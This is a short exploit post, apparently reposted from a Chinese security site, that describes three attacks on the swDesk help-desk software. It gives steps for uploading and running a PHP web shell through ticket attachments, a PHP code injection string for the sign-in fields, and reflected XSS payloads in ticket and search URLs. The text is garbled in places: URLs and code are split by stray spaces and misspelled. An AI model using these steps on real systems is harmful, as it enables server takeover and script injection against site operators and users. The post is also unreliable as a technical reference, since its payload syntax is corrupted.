Multiple swDesk Defects
Written by Red Security TEAM www.2cto.com
Developer: http://www.swdesk.com/
Test Platform: Apache
Test:
#
# I. upload any file
#1. Go to http://www.bkjia.com/create_ticket.php
#2. Fil all Input Fields And Click on Submit Ticket
#3. Click on the View Ticket and you shoshould go to the link Like: http://www.bkjia.com/view_ticket.php? Email = [Your Email] & id = 1
#4. You see Send Message box, Write any thing there and attach your PHP file in the Upload attachment and Click on Send Message
#5. You can see your attachment abve Like: Attachment: shell. php, Click on it and you see your PHP code has been runed ;)
#
# II. PHP code injection
#1. Go to http://www.bkjia.com/signin. php: Vulnerability Input Fields: email, password
#2. Write your php in Input Fields Like: phpi $ {@ print (RedSecurityTEAM )}
#
# III. XSS Defects
#1. http://www.bkjia.com/view_ticket.php? Email = example@example.com & id = "onmouseover = alert (1) bad ="
#2. http://www.bkjia.com/kb_search.php? Keywords = "onmouseover = alert (1) bad =" & mode = Search
Www.2cto.com:
Targeted filtering and Verification